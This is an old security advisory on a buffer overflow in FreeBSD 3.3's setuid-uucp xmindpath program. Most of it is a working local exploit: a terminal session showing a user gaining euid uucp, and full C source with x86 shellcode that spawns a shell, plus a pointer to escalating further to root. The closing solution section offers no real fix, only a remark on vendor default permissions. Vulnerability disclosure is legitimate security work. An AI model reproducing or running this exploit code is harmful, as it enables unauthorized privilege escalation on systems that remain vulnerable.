COMMAND

    /usr/X11R6/bin/xmindpath

SYSTEMS AFFECTED

    FreeBSD 3.3

PROBLEM

    Brock  Tellier  found  following.    It  was  tested  on   FreeBSD
    3.3-RELEASE.   The program  was installed  with the  default perms
    given when unpacked with sysinstall:

        -rwsr-xr-x 1 uucp bin 7780 Sep 11 05:15 /usr/X11R6/bin/xmindpath

    /usr/X11R6/bin/xmindpath (suid uucp by default), contains a buffer
    overflow which  will allow  any user  to gain  uucp privs.  Simply
    enough:

        xmindpath -f $BUF

    See my "faxalter"  advisory for more  info on gaining  root w/euid
    uucp.  Exploit:

        bash-2.03$ ls -la `which xmindpath`; id
        -rwsr-xr-x 1 uucp bin 7780 Sep 11 05:15 /usr/X11R6/bin/xmindpath
        uid=1000(xnec) gid=1000(xnec) groups=1000(xnec)
        bash-2.03$ ./xmindx
        FreeBSD xmindpath exploit /path/to/xmindpath -f $RET
        Brock Tellier btellier@usa.net
        Using addr: 0xbfbfcfa8
        bash-2.03$ xmindpath -f $RET
        lock open: File name too long
        $ id
        uid=1000(xnec) euid=66(uucp) gid=1000(xnec) groups=1000(xnec)
        $

    The code itself:

    /*
     *
     * FreeBSD 3.3 xmindpath exploit gives euid uucp
     * Compile: gcc -o xmindx xmindx.c
     * Usage: ./xmindx <offset>  /path/to/mindpath -f $RET
     * Brock Tellier <btellier@usa.net>
     *
     */


    #include <stdlib.h>
    #include <stdio.h>

    char shell[]= /* mudge@l0pht.com */
    "\xeb\x35\x5e\x59\x33\xc0\x89\x46\xf5\x83\xc8\x07\x66\x89\x46\xf9"
    "\x8d\x1e\x89\x5e\x0b\x33\xd2\x52\x89\x56\x07\x89\x56\x0f\x8d\x46"
    "\x0b\x50\x8d\x06\x50\xb8\x7b\x56\x34\x12\x35\x40\x56\x34\x12\x51"
    "\x9a>:)(:<\xe8\xc6\xff\xff\xff/bin/sh";

    #define EGGLEN 2048
    #define RETLEN 279
    #define ALIGN 3
    #define NOP 0x90

    int main(int argc, char *argv[]) {

    long int offset=0;
    int i;
    int egglen = EGGLEN;
    int retlen = RETLEN;
    long int addr = 0xbfbfcfa8;
    char egg[EGGLEN];
    char ret[RETLEN];

    if (argc == 2) offset = atoi(argv[1]);

    addr=addr + offset;

    fprintf(stderr, "FreeBSD xmindpath exploit /path/to/xmindpath -f $RET\n");
    fprintf(stderr, "Brock Tellier btellier@usa.net\n");
    fprintf(stderr, "Using addr: 0x%x\n", addr);

    memset(egg,NOP,egglen);
    memcpy(egg+(egglen - strlen(shell) - 1),shell,strlen(shell));

    for(i=ALIGN;i< retlen;i+=4)
    *(int *)&ret[i]=addr;

    memcpy(egg, "EGG=", 4);
    putenv(egg);
    memcpy(ret,"RET=",4);
    putenv(ret);

    system("/usr/local/bin/bash");

    }

SOLUTION

    This one is a hole in the vendor-provided software, which wants to
    install it setuid  uucp by default.   With ~2800 third-party  apps
    shipped with FreeBSD, you may expect this to happen.